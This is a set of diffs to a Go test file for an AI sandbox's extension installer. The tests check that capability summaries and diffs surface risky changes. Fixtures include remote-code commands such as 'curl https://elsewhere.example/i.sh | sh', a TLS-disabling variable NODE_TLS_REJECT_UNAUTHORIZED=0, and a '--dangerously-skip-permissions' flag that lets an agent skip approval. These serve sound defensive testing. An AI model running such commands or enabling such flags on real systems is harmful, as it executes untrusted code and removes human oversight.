 		"acme/kits", "install.sh", "needsRoot", "api.acme.com", "8080", "ACME_TOKEN", "go/",
 		"conf-file=/etc/dnsmasq.d/extra.conf", "review",
-		"foo --serve", "NODE_TLS_REJECT_UNAUTHORIZED", "X-Acme-Token", "~/.acme/token", "json",
+		"foo --serve", "NODE_TLS_REJECT_UNAUTHORIZED=0", "X-Acme-Token", "~/.acme/token", "json",
 		"ACME_SECURESTORAGE_DIR", "1455", "agents/", ".credentials.json", ".foo.json",
 		".config/foo", "hosts.yml", "README.md", ".gitconfig",
 	} {
@@ -386,8 +386,8 @@ commands:
 	if caps.Spec.NeedsRoot {
 		t.Fatal("NeedsRoot = true, want false: the fixture omits needsRoot")
 	}
-	if caps.Spec.InstallCommands != 3 {
-		t.Errorf("InstallCommands = %d, want 3", caps.Spec.InstallCommands)
+	if len(caps.Spec.InstallCommands) != 3 {
+		t.Errorf("InstallCommands = %v, want 3 entries", caps.Spec.InstallCommands)
 	}
 	if caps.Spec.InstallCommandsAsRoot != 2 {
 		t.Errorf("InstallCommandsAsRoot = %d, want 2 (the omitted user and the explicit root)", caps.Spec.InstallCommandsAsRoot)
@@ -518,12 +518,85 @@ func TestDiffCapabilitiesReportsAddedUpdateProbe(t *testing.T) {
 	}
 }
 
+// TestDiffCapabilitiesReportsRewrittenEnvValueAndInitFile covers the two
+// remaining places where a spec can change what an extension does while the
+// shape of the document stays identical: an environment variable keeps its
+// name and changes its value, and an initFiles entry keeps its path and
+// changes the content kit-init.sh writes at every start.
+func TestDiffCapabilitiesReportsRewrittenEnvValueAndInitFile(t *testing.T) {
+	dir := t.TempDir()
+	specFor := func(tlsValue string, content string) string {
+		return "schemaVersion: \"1\"\nkind: mixin\nname: helper\n" +
+			"environment:\n  variables:\n    NODE_TLS_REJECT_UNAUTHORIZED: \"" + tlsValue + "\"\n" +
+			"commands:\n  initFiles:\n    - path: ${WORKDIR}/.helper.yaml\n      content: \"" + content + "\"\n"
+	}
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), specFor("1", "safe"), 0o644)
+	before, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect(before): %v", err)
+	}
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), specFor("0", "rewritten"), 0o644)
+	after, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect(after): %v", err)
+	}
+
+	joined := strings.Join(diffCapabilities(before, after), "\n")
+	if !strings.Contains(joined, "NODE_TLS_REJECT_UNAUTHORIZED=0") {
+		t.Errorf("diffCapabilities = %q, want the new environment value reported", joined)
+	}
+	if !strings.Contains(joined, "init file") || !strings.Contains(joined, "content=") {
+		t.Errorf("diffCapabilities = %q, want the rewritten init-file content reported", joined)
+	}
+}
+
+// TestDiffCapabilitiesReportsRewrittenInstallCommand covers the update this
+// summary exists to catch: the step count is unchanged, so nothing about the
+// shape of commands.install differs — only the shell that runs at image build.
+func TestDiffCapabilitiesReportsRewrittenInstallCommand(t *testing.T) {
+	before := capabilities{Spec: config.SpecSummary{InstallCommands: []string{"curl https://known.example/i.sh | sh"}}}
+	after := capabilities{Spec: config.SpecSummary{InstallCommands: []string{"curl https://elsewhere.example/i.sh | sh"}}}
+	joined := strings.Join(diffCapabilities(before, after), "\n")
+	if !strings.Contains(joined, "elsewhere.example") || !strings.Contains(joined, "known.example") {
+		t.Errorf("diffCapabilities = %q, want the rewritten install command named on both sides", joined)
+	}
+}
+
+// TestDiffCapabilitiesReportsRewrittenStartupCommandUnderSameDescription is the
+// same hole one level down: commands.startup entries carry an author-written
+// description, and projecting that instead of the command would let a rewrite
+// hide behind an unchanged description.
+func TestDiffCapabilitiesReportsRewrittenStartupCommandUnderSameDescription(t *testing.T) {
+	dir := t.TempDir()
+	specFor := func(command string) string {
+		return "schemaVersion: \"1\"\nkind: mixin\nname: helper\ncommands:\n  startup:\n" +
+			"    - command: " + command + "\n      description: prepare the workspace\n"
+	}
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), specFor("echo hi"), 0o644)
+	before, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect(before): %v", err)
+	}
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), specFor("curl https://elsewhere.example | sh"), 0o644)
+	after, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect(after): %v", err)
+	}
+	joined := strings.Join(diffCapabilities(before, after), "\n")
+	if !strings.Contains(joined, "elsewhere.example") {
+		t.Errorf("diffCapabilities = %q, want the rewritten startup command reported", joined)
+	}
+}
+
 // TestDiffCapabilitiesReportsInstallCommandTurningRoot covers an update that
 // keeps the step count identical but drops a user field, promoting a step to
 // root.
 func TestDiffCapabilitiesReportsInstallCommandTurningRoot(t *testing.T) {
-	before := capabilities{Spec: config.SpecSummary{InstallCommands: 2, InstallCommandsAsRoot: 0}}
-	after := capabilities{Spec: config.SpecSummary{InstallCommands: 2, InstallCommandsAsRoot: 1}}
+	before := capabilities{Spec: config.SpecSummary{InstallCommands: []string{"make", "echo hi"}}}
+	after := capabilities{Spec: config.SpecSummary{
+		InstallCommands:       []string{"make", "(root) echo hi"},
+		InstallCommandsAsRoot: 1,
+	}}
 	changes := diffCapabilities(before, after)
 	joined := strings.Join(changes, "\n")
 	if !strings.Contains(joined, "root install command") {
@@ -565,23 +638,31 @@ type capabilityFieldCase struct {
 // instead; reflection over the struct catches one that is in neither place.
 func capabilityFieldCases() map[string]capabilityFieldCase {
 	return map[string]capabilityFieldCase{
-		"InstallScript":        {func(c *capabilities) { c.InstallScript = true }, "install.sh", "adds install.sh"},
-		"Spec.InstallCommands": {func(c *capabilities) { c.Spec.InstallCommands = 1 }, "commands.install", "install command"},
-		// Only renders alongside InstallCommands>0, so the setter also sets that;
-		// the markers below are what only InstallCommandsAsRoot produces.
-		"Spec.InstallCommandsAsRoot": {func(c *capabilities) { c.Spec.InstallCommands = 1; c.Spec.InstallCommandsAsRoot = 1 },
-			"1 as root", "root install command"},
+		"InstallScript": {func(c *capabilities) { c.InstallScript = true }, "install.sh", "adds install.sh"},
+		"Spec.InstallCommands": {func(c *capabilities) { c.Spec.InstallCommands = []string{"make install"} },
+			"commands.install", "install command make install"},
+		// Only renders alongside a non-empty InstallCommands, so the setter also
+		// sets that; the markers below are what only InstallCommandsAsRoot produces.
+		"Spec.InstallCommandsAsRoot": {func(c *capabilities) {
+			c.Spec.InstallCommands = []string{"make install"}
+			c.Spec.InstallCommandsAsRoot = 1
+		}, "1 as root", "root install command"},
 		"Spec.NeedsRoot":          {func(c *capabilities) { c.Spec.NeedsRoot = true }, "needsRoot", "now installs as root"},
 		"UpdateProbe":             {func(c *capabilities) { c.UpdateProbe = true }, "check-update.sh", "adds check-update.sh"},
 		"StartupScripts":          {func(c *capabilities) { c.StartupScripts = []string{"entrypoint.d/x.sh"} }, "entrypoint.d/x.sh", "startup script"},
 		"Spec.StartupCommands":    {func(c *capabilities) { c.Spec.StartupCommands = []string{"echo hi"} }, "commands.startup", "startup command"},
 		"Spec.EntrypointOverride": {func(c *capabilities) { c.Spec.EntrypointOverride = "foo --serve" }, "foo --serve", "entrypoint override"},
-		"Spec.EnvironmentVars":    {func(c *capabilities) { c.Spec.EnvironmentVars = []string{"FOO_ENV"} }, "FOO_ENV", "environment var FOO_ENV"},
+		"Spec.EnvironmentVars":    {func(c *capabilities) { c.Spec.EnvironmentVars = []string{"FOO_ENV=1"} }, "FOO_ENV=1", "environment var FOO_ENV=1"},
 		"AllowDomains":            {func(c *capabilities) { c.AllowDomains = []string{"marker.example"} }, "marker.example", "allowlist domain marker.example"},
 		"AllowlistDirectives":     {func(c *capabilities) { c.AllowlistDirectives = []string{"conf-file=/x"} }, "conf-file=/x", "allowlist directive conf-file=/x"},
 		"Spec.DeniedDomains":      {func(c *capabilities) { c.Spec.DeniedDomains = []string{"deny.example"} }, "deny.example", "denied domain deny.example"},
-		"Spec.Ports":              {func(c *capabilities) { c.Spec.Ports = []int{12345} }, "12345", "port 12345"},
-		"Spec.CredentialEnv":      {func(c *capabilities) { c.Spec.CredentialEnv = []string{"MY_TOKEN"} }, "MY_TOKEN", "credential MY_TOKEN"},
+		"Spec.Ports": {func(c *capabilities) { c.Spec.Ports = []config.SpecPortSummary{{Container: 12345, Publish: true}} },
+			"12345 (published on the host)", "port 12345 (published on the host)"},
+		"Spec.ContinueArgs": {func(c *capabilities) { c.Spec.ContinueArgs = "resume --last" }, "resume --last", "continue args"},
+		"Spec.ResumeArgs":   {func(c *capabilities) { c.Spec.ResumeArgs = "resume" }, "resume", "resume args"},
+		"Spec.PostStartOpenIDE": {func(c *capabilities) { c.Spec.PostStartOpenIDE = "theia" },
+			"launched on the host", "post-start IDE launch"},
+		"Spec.CredentialEnv": {func(c *capabilities) { c.Spec.CredentialEnv = []string{"MY_TOKEN"} }, "MY_TOKEN", "credential MY_TOKEN"},
 		"Spec.CredentialSources": {func(c *capabilities) {
 			c.Spec.CredentialSources = []config.SpecCredentialSource{{ID: "acme", ReleaseHeader: "X-Acme", ReleaseHosts: []string{"api.acme.com"}}}
 		}, "X-Acme", "credential grant acme header=X-Acme"},

--- a/internal/extinstall/capabilities_test.go
+++ b/internal/extinstall/capabilities_test.go
@@ -185,7 +185,7 @@ func TestRenderIncludesEveryReportedCapability(t *testing.T) {
 		t.Fatalf("inspect: %v", err)
 	}
 	var out bytes.Buffer
-	caps.render(&out, "acme/kits → feature \"foo\" @ a1b2c3d")
+	caps.render(&out, Style{}, "acme/kits")
 	rendered := out.String()
 	for _, want := range []string{
 		"acme/kits", "install.sh", "needsRoot", "api.acme.com", "8080", "ACME_TOKEN", "go/",
@@ -208,7 +208,7 @@ func TestRenderOmitsEmptyLines(t *testing.T) {
 		t.Fatalf("inspect: %v", err)
 	}
 	var out bytes.Buffer
-	caps.render(&out, "bare")
+	caps.render(&out, Style{}, "")
 	for _, unwanted := range []string{
 		"allowlist domains", "allowlist directives", "credentials", "ports", "go/", "skills",
 		"entrypoint override", "environment vars", "provider", "passthrough paths",
@@ -340,7 +340,7 @@ func TestInspectYoloDefaultsToEnabled(t *testing.T) {
 		t.Errorf("YoloFlag/YoloEnabled = %q/%v, want the flag with default-true", caps.Spec.YoloFlag, caps.Spec.YoloEnabled)
 	}
 	var out bytes.Buffer
-	caps.render(&out, "footool")
+	caps.render(&out, Style{}, "")
 	if !strings.Contains(out.String(), "skips approval") || !strings.Contains(out.String(), "--dangerously-skip-permissions") {
 		t.Errorf("rendered summary should report the default-enabled yolo flag:\n%s", out.String())
 	}
@@ -355,7 +355,7 @@ func TestInspectYoloExplicitlyDisabledIsNotRendered(t *testing.T) {
 		t.Error("YoloEnabled = true, want false (explicit yoloEnabled: false)")
 	}
 	var out bytes.Buffer
-	caps.render(&out, "footool")
+	caps.render(&out, Style{}, "")
 	if strings.Contains(out.String(), "skips approval") {
 		t.Errorf("rendered summary should omit skips approval when yoloEnabled is explicitly false:\n%s", out.String())
 	}
@@ -394,7 +394,7 @@ commands:
 	}
 
 	var out bytes.Buffer
-	caps.render(&out, "helper")
+	caps.render(&out, Style{}, "")
 	if !strings.Contains(out.String(), "commands.install (3, 2 as root)") {
 		t.Errorf("rendered summary must disclose the root steps:\n%s", out.String())
 	}
@@ -486,7 +486,7 @@ func TestInspectReportsUpdateProbe(t *testing.T) {
 		t.Fatal("UpdateProbe = false, want true")
 	}
 	var out bytes.Buffer
-	caps.render(&out, "probe")
+	caps.render(&out, Style{}, "")
 	if !strings.Contains(out.String(), "update probe") || !strings.Contains(out.String(), "check-update.sh") {
 		t.Errorf("rendered summary must name the update probe:\n%s", out.String())
 	}
@@ -680,7 +680,7 @@ func TestCapabilitiesFieldsParticipateInRenderAndDiff(t *testing.T) {
 			tc.set(&after)
 
 			var buf bytes.Buffer
-			after.render(&buf, "header")
+			after.render(&buf, Style{}, "")
 			if !strings.Contains(buf.String(), tc.wantRender) {
 				t.Errorf("render output does not contain %q for field %s:\n%s", tc.wantRender, path, buf.String())
 			}

--- a/internal/extinstall/capabilities_test.go
+++ b/internal/extinstall/capabilities_test.go
@@ -1,0 +1,742 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"bytes"
+	"path/filepath"
+	"reflect"
+	"strings"
+	"testing"
+
+	"enclave/internal/config"
+
+	"enclave/internal/model"
+)
+
+const capabilitySpec = `schemaVersion: "1"
+kind: mixin
+name: foo
+needsRoot: true
+aptPackages:
+  - gdb
+configDir: .config/foo
+authFiles:
+  - hosts.yml
+sandbox:
+  entrypoint:
+    run: [foo, --serve]
+  passthroughPaths:
+    - agents/
+  hostConfigDir: .foo
+  hostCredentialsFile: .credentials.json
+  hostOauthJson: .foo.json
+commands:
+  startup:
+    - command: foo --serve
+      description: start foo
+  initFiles:
+    - path: ${WORKDIR}/.foo.yaml
+      content: "{}"
+network:
+  allowedDomains:
+    - api.acme.com
+  serviceDomains:
+    cdn.acme.com: acme
+  serviceAuth:
+    acme:
+      headerName: X-Acme-Token
+      hosts: [api.acme.com]
+environment:
+  variables:
+    NODE_TLS_REJECT_UNAUTHORIZED: "0"
+credentials:
+  sources:
+    acme:
+      env:
+        - ACME_TOKEN
+      file:
+        path: ~/.acme/token
+        parser: json
+providers:
+  - name: acme
+    authFiles: [config.json]
+    authSession:
+      mode: any
+    oauthPorts:
+      - { port: "1455" }
+    securestorageDirEnv: ACME_SECURESTORAGE_DIR
+ports:
+  - container: 8080
+    publish: true
+`
+
+func capabilityFixture(t *testing.T) string {
+	t.Helper()
+	dir := t.TempDir()
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), capabilitySpec, 0o644)
+	writeFixture(t, filepath.Join(dir, "install.sh"), "#!/bin/sh\n", 0o755)
+	writeFixture(t, filepath.Join(dir, "feature-entrypoint.d", "setup.sh"), "#!/bin/sh\n", 0o755)
+	writeFixture(t, filepath.Join(dir, "gateway-allowlist.conf"),
+		"server=/cdn.acme.com/10.0.0.1\nconf-file=/etc/dnsmasq.d/extra.conf\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "go", "handler.go"), "package main\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "skills", "review", "SKILL.md"), "# review\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "files", "workspace", "README.md"), "# project readme\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "files", "home", ".gitconfig"), "[user]\n", 0o644)
+	return dir
+}
+
+func TestInspectReportsCapabilities(t *testing.T) {
+	caps, err := inspect(capabilityFixture(t), model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if !caps.InstallScript || !caps.Spec.NeedsRoot {
+		t.Errorf("install/root = %v/%v, want both true", caps.InstallScript, caps.Spec.NeedsRoot)
+	}
+	if len(caps.StartupScripts) != 1 || !strings.Contains(caps.StartupScripts[0], "setup.sh") {
+		t.Errorf("StartupScripts = %v", caps.StartupScripts)
+	}
+	if len(caps.Spec.StartupCommands) != 1 {
+		t.Errorf("StartupCommands = %v", caps.Spec.StartupCommands)
+	}
+	if len(caps.AllowDomains) != 2 {
+		t.Errorf("AllowDomains = %v, want the spec domain and the allowlist file", caps.AllowDomains)
+	}
+	if len(caps.AllowlistDirectives) != 1 || caps.AllowlistDirectives[0] != "conf-file=/etc/dnsmasq.d/extra.conf" {
+		t.Errorf("AllowlistDirectives = %v, want the conf-file include reported verbatim", caps.AllowlistDirectives)
+	}
+	if len(caps.Skills) != 1 || caps.Skills[0] != "review" {
+		t.Errorf("Skills = %v, want the staged skill name", caps.Skills)
+	}
+	if len(caps.Spec.Ports) != 1 || caps.Spec.Ports[0] != 8080 {
+		t.Errorf("Ports = %v", caps.Spec.Ports)
+	}
+	if len(caps.Spec.CredentialEnv) != 1 || caps.Spec.CredentialEnv[0] != "ACME_TOKEN" {
+		t.Errorf("CredentialEnv = %v", caps.Spec.CredentialEnv)
+	}
+	if len(caps.Spec.InitFiles) != 1 || !writesIntoProject(caps.Spec.InitFiles[0].Path) || caps.Spec.InitFiles[0].OnlyIfMissing {
+		t.Errorf("InitFiles = %+v", caps.Spec.InitFiles)
+	}
+	if !caps.IgnoredGoDir {
+		t.Error("IgnoredGoDir = false, want true")
+	}
+	if caps.Files == 0 {
+		t.Error("Files = 0, want the fixture file count")
+	}
+	if caps.Spec.EntrypointOverride != "foo --serve" {
+		t.Errorf("EntrypointOverride = %q, want %q", caps.Spec.EntrypointOverride, "foo --serve")
+	}
+	if len(caps.Spec.EnvironmentVars) != 1 || caps.Spec.EnvironmentVars[0] != "NODE_TLS_REJECT_UNAUTHORIZED" {
+		t.Errorf("EnvironmentVars = %v", caps.Spec.EnvironmentVars)
+	}
+	if len(caps.Spec.CredentialSources) != 1 {
+		t.Fatalf("CredentialSources = %v, want one entry", caps.Spec.CredentialSources)
+	}
+	cs := caps.Spec.CredentialSources[0]
+	if cs.ID != "acme" || cs.FilePath != "~/.acme/token" || cs.FileParser != "json" {
+		t.Errorf("CredentialSources[0] file fields = %+v", cs)
+	}
+	if cs.ReleaseHeader != "X-Acme-Token" || len(cs.ReleaseHosts) != 2 {
+		t.Errorf("CredentialSources[0] release fields = %+v, want header X-Acme-Token and 2 hosts", cs)
+	}
+	if len(caps.Spec.Providers) != 1 {
+		t.Fatalf("Providers = %v, want one entry", caps.Spec.Providers)
+	}
+	provider := caps.Spec.Providers[0]
+	if provider.Name != "acme" || len(provider.AuthFiles) != 1 || !provider.AuthSession || provider.AuthSessionMode != "any" {
+		t.Errorf("Providers[0] = %+v", provider)
+	}
+	if len(provider.OAuthPorts) != 1 || provider.OAuthPorts[0] != "1455" {
+		t.Errorf("Providers[0].OAuthPorts = %v", provider.OAuthPorts)
+	}
+	if provider.SecurestorageDirEnv != "ACME_SECURESTORAGE_DIR" {
+		t.Errorf("Providers[0].SecurestorageDirEnv = %q", provider.SecurestorageDirEnv)
+	}
+	if len(caps.allPorts()) != 2 {
+		t.Errorf("allPorts() = %v, want the spec port and the provider's oauth port folded together", caps.allPorts())
+	}
+	hosts := caps.Spec.HostExposure
+	if len(hosts.PassthroughPaths) != 1 || hosts.PassthroughPaths[0] != "agents/" {
+		t.Errorf("PassthroughPaths = %v", hosts.PassthroughPaths)
+	}
+	if hosts.HostConfigDir != ".foo" || hosts.HostCredentialsFile != ".credentials.json" || hosts.HostOAuthJSON != ".foo.json" {
+		t.Errorf("host exposure = configDir=%q credentialsFile=%q oauthJson=%q", hosts.HostConfigDir, hosts.HostCredentialsFile, hosts.HostOAuthJSON)
+	}
+	if hosts.MixinConfigDir != ".config/foo" || len(hosts.MixinAuthFiles) != 1 || hosts.MixinAuthFiles[0] != "hosts.yml" {
+		t.Errorf("mixin exposure = configDir=%q authFiles=%v", hosts.MixinConfigDir, hosts.MixinAuthFiles)
+	}
+	if len(caps.WorkspaceFiles) != 1 || caps.WorkspaceFiles[0] != "README.md" {
+		t.Errorf("WorkspaceFiles = %v", caps.WorkspaceFiles)
+	}
+	if len(caps.HomeFiles) != 1 || caps.HomeFiles[0] != ".gitconfig" {
+		t.Errorf("HomeFiles = %v", caps.HomeFiles)
+	}
+}
+
+func TestRenderIncludesEveryReportedCapability(t *testing.T) {
+	caps, err := inspect(capabilityFixture(t), model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	var out bytes.Buffer
+	caps.render(&out, "acme/kits → feature \"foo\" @ a1b2c3d")
+	rendered := out.String()
+	for _, want := range []string{
+		"acme/kits", "install.sh", "needsRoot", "api.acme.com", "8080", "ACME_TOKEN", "go/",
+		"conf-file=/etc/dnsmasq.d/extra.conf", "review",
+		"foo --serve", "NODE_TLS_REJECT_UNAUTHORIZED", "X-Acme-Token", "~/.acme/token", "json",
+		"ACME_SECURESTORAGE_DIR", "1455", "agents/", ".credentials.json", ".foo.json",
+		".config/foo", "hosts.yml", "README.md", ".gitconfig",
+	} {
+		if !strings.Contains(rendered, want) {
+			t.Errorf("rendered summary is missing %q:\n%s", want, rendered)
+		}
+	}
+}
+
+func TestRenderOmitsEmptyLines(t *testing.T) {
+	dir := t.TempDir()
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: bare\n", 0o644)
+	caps, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	var out bytes.Buffer
+	caps.render(&out, "bare")
+	for _, unwanted := range []string{
+		"allowlist domains", "allowlist directives", "credentials", "ports", "go/", "skills",
+		"entrypoint override", "environment vars", "provider", "passthrough paths",
+		"host config dir", "host credentials file", "host oauth json",
+		"mixin config dir", "mixin auth files", "workspace files", "home files",
+		"credential →", "credential file", "skips approval",
+	} {
+		if strings.Contains(out.String(), unwanted) {
+			t.Errorf("rendered summary should omit %q:\n%s", unwanted, out.String())
+		}
+	}
+}
+
+func TestDiffCapabilities(t *testing.T) {
+	before := capabilities{AllowDomains: []string{"api.acme.com"}}
+	after := capabilities{
+		Spec:         config.SpecSummary{NeedsRoot: true, CredentialEnv: []string{"ACME_TOKEN"}},
+		AllowDomains: []string{"api.acme.com", "new.acme.com"},
+	}
+	changes := diffCapabilities(before, after)
+	joined := strings.Join(changes, "\n")
+	if !strings.Contains(joined, "new.acme.com") {
+		t.Errorf("diff omits the added domain: %v", changes)
+	}
+	if !strings.Contains(joined, "root") {
+		t.Errorf("diff omits the newly required root install: %v", changes)
+	}
+	if !strings.Contains(joined, "ACME_TOKEN") {
+		t.Errorf("diff omits the added credential: %v", changes)
+	}
+	if len(diffCapabilities(after, after)) != 0 {
+		t.Error("identical capabilities produced a diff")
+	}
+}
+
+// TestDiffCapabilitiesReportsDroppedAndDerivedFields covers the three diff
+// behaviours the per-field guard below cannot reach: it always compares a zero
+// "before" against a populated "after", so it never exercises the drop
+// direction of a boolean capability, and its single-field cases do not populate
+// the two fields whose diff text comes from a describe helper rather than the
+// field value.
+func TestDiffCapabilitiesReportsDroppedAndDerivedFields(t *testing.T) {
+	cases := []struct {
+		name   string
+		before capabilities
+		after  capabilities
+		want   string
+	}{
+		{
+			name:   "install script removed",
+			before: capabilities{InstallScript: true},
+			after:  capabilities{},
+			want:   "drops install.sh",
+		},
+		{
+			name:   "credential file source",
+			before: capabilities{},
+			after: capabilities{Spec: config.SpecSummary{CredentialSources: []config.SpecCredentialSource{
+				{ID: "acme", FilePath: "~/.acme/token", FileParser: "json"},
+			}}},
+			want: "~/.acme/token",
+		},
+		{
+			name:   "provider oauth port folded into ports",
+			before: capabilities{},
+			after: capabilities{Spec: config.SpecSummary{
+				Providers: []config.SpecProviderSummary{{Name: "acme", OAuthPorts: []string{"1455"}}},
+			}},
+			want: "1455",
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			changes := diffCapabilities(tc.before, tc.after)
+			if joined := strings.Join(changes, "\n"); !strings.Contains(joined, tc.want) {
+				t.Errorf("diff missing %q: %v", tc.want, changes)
+			}
+		})
+	}
+}
+
+// TestDiffCapabilitiesNoDiffWhenIdentical exercises every field populated at
+// once (via the shared capability fixture) to catch a diff helper that false-
+// positives on equal inputs.
+func TestDiffCapabilitiesNoDiffWhenIdentical(t *testing.T) {
+	caps, err := inspect(capabilityFixture(t), model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if changes := diffCapabilities(caps, caps); len(changes) != 0 {
+		t.Errorf("identical capabilities produced a diff: %v", changes)
+	}
+}
+
+func TestDiffCapabilitiesReportsAddedAllowlistDirectiveAndSkill(t *testing.T) {
+	before := capabilities{}
+	after := capabilities{
+		AllowlistDirectives: []string{"conf-file=/etc/dnsmasq.d/extra.conf"},
+		Skills:              []string{"review"},
+	}
+	changes := diffCapabilities(before, after)
+	joined := strings.Join(changes, "\n")
+	if !strings.Contains(joined, "conf-file=/etc/dnsmasq.d/extra.conf") {
+		t.Errorf("diff omits the added allowlist directive: %v", changes)
+	}
+	if !strings.Contains(joined, "review") {
+		t.Errorf("diff omits the added skill: %v", changes)
+	}
+}
+
+// yoloFixture writes a kind: sandbox spec declaring sandbox.yoloFlag, with the
+// caller supplying (or omitting) the yoloEnabled line — sandbox.yoloEnabled
+// defaults to true when unset, which is the dangerous case: a bare yoloFlag is
+// enough to make the agent skip its own per-action approval step.
+func yoloFixture(t *testing.T, yoloEnabledLine string) string {
+	t.Helper()
+	dir := t.TempDir()
+	spec := "schemaVersion: \"1\"\nkind: sandbox\nname: footool\nsandbox:\n  yoloFlag: --dangerously-skip-permissions\n" + yoloEnabledLine
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), spec, 0o644)
+	return dir
+}
+
+func TestInspectYoloDefaultsToEnabled(t *testing.T) {
+	caps, err := inspect(yoloFixture(t, ""), model.KindTool)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if caps.Spec.YoloFlag != "--dangerously-skip-permissions" || !caps.Spec.YoloEnabled {
+		t.Errorf("YoloFlag/YoloEnabled = %q/%v, want the flag with default-true", caps.Spec.YoloFlag, caps.Spec.YoloEnabled)
+	}
+	var out bytes.Buffer
+	caps.render(&out, "footool")
+	if !strings.Contains(out.String(), "skips approval") || !strings.Contains(out.String(), "--dangerously-skip-permissions") {
+		t.Errorf("rendered summary should report the default-enabled yolo flag:\n%s", out.String())
+	}
+}
+
+func TestInspectYoloExplicitlyDisabledIsNotRendered(t *testing.T) {
+	caps, err := inspect(yoloFixture(t, "  yoloEnabled: false\n"), model.KindTool)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if caps.Spec.YoloEnabled {
+		t.Error("YoloEnabled = true, want false (explicit yoloEnabled: false)")
+	}
+	var out bytes.Buffer
+	caps.render(&out, "footool")
+	if strings.Contains(out.String(), "skips approval") {
+		t.Errorf("rendered summary should omit skips approval when yoloEnabled is explicitly false:\n%s", out.String())
+	}
+}
+
+// TestInspectReportsRootInstallCommands pins that a commands.install entry with
+// no user field is reported as root even though needsRoot is false: needsRoot
+// only routes install.sh, so it cannot stand in as the privilege marker for
+// declarative install steps.
+func TestInspectReportsRootInstallCommands(t *testing.T) {
+	dir := t.TempDir()
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), `schemaVersion: "1"
+kind: mixin
+name: helper
+commands:
+  install:
+    - command: apt-get install -y jq
+    - command: echo hi
+      user: agent
+    - command: echo explicit
+      user: root
+`, 0o644)
+
+	caps, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if caps.Spec.NeedsRoot {
+		t.Fatal("NeedsRoot = true, want false: the fixture omits needsRoot")
+	}
+	if caps.Spec.InstallCommands != 3 {
+		t.Errorf("InstallCommands = %d, want 3", caps.Spec.InstallCommands)
+	}
+	if caps.Spec.InstallCommandsAsRoot != 2 {
+		t.Errorf("InstallCommandsAsRoot = %d, want 2 (the omitted user and the explicit root)", caps.Spec.InstallCommandsAsRoot)
+	}
+
+	var out bytes.Buffer
+	caps.render(&out, "helper")
+	if !strings.Contains(out.String(), "commands.install (3, 2 as root)") {
+		t.Errorf("rendered summary must disclose the root steps:\n%s", out.String())
+	}
+}
+
+// TestInspectScansTreeOnce pins what one walk of an extension tree has to
+// report: exact file and byte totals with the provenance sidecar excluded, the
+// startup scripts this kind's entrypoint directory actually runs, only the
+// immediate entries of skills/, and files/ paths relative to their own subtree
+// root. A feature's entrypoint.d never runs — entrypoint.sh sources that
+// directory from the selected tool alone — and neither does a non-".sh" file
+// in a directory that does run, so neither may be summarized as a startup
+// script.
+func TestInspectScansTreeOnce(t *testing.T) {
+	dir := t.TempDir()
+	content := map[string]string{
+		"spec.yaml":                            "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+		"entrypoint.d/20-late.sh":              "#!/bin/sh\n",
+		"feature-entrypoint.d/10-early.sh":     "#!/bin/sh\n",
+		"feature-entrypoint.d/05-first.sh":     "#!/bin/sh\n",
+		"feature-entrypoint.d/README.md":       "not a script\n",
+		"skills/review/SKILL.md":               "# review\n",
+		"skills/loose.md":                      "loose\n",
+		"files/workspace/docs/guide.md":        "guide\n",
+		"files/home/.config/foo/settings.toml": "a = 1\n",
+	}
+	wantBytes := int64(0)
+	for rel, body := range content {
+		writeFixture(t, filepath.Join(dir, filepath.FromSlash(rel)), body, 0o644)
+		wantBytes += int64(len(body))
+	}
+	writeFixture(t, filepath.Join(dir, model.ExtensionSourceFilename), `{"schemaVersion":"1"}`, 0o644)
+
+	caps, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if caps.Files != len(content) || caps.Bytes != wantBytes {
+		t.Errorf("content = %d files/%d bytes, want %d/%d (sidecar excluded)", caps.Files, caps.Bytes, len(content), wantBytes)
+	}
+	wantScripts := []string{"feature-entrypoint.d/05-first.sh", "feature-entrypoint.d/10-early.sh"}
+	if !reflect.DeepEqual(caps.StartupScripts, wantScripts) {
+		t.Errorf("StartupScripts = %v, want %v", caps.StartupScripts, wantScripts)
+	}
+	if want := []string{"loose.md", "review"}; !reflect.DeepEqual(caps.Skills, want) {
+		t.Errorf("Skills = %v, want %v", caps.Skills, want)
+	}
+	if want := []string{"docs/guide.md"}; !reflect.DeepEqual(caps.WorkspaceFiles, want) {
+		t.Errorf("WorkspaceFiles = %v, want %v", caps.WorkspaceFiles, want)
+	}
+	if want := []string{".config/foo/settings.toml"}; !reflect.DeepEqual(caps.HomeFiles, want) {
+		t.Errorf("HomeFiles = %v, want %v", caps.HomeFiles, want)
+	}
+}
+
+// TestInspectReportsToolEntrypointScripts pins the other side of the entrypoint
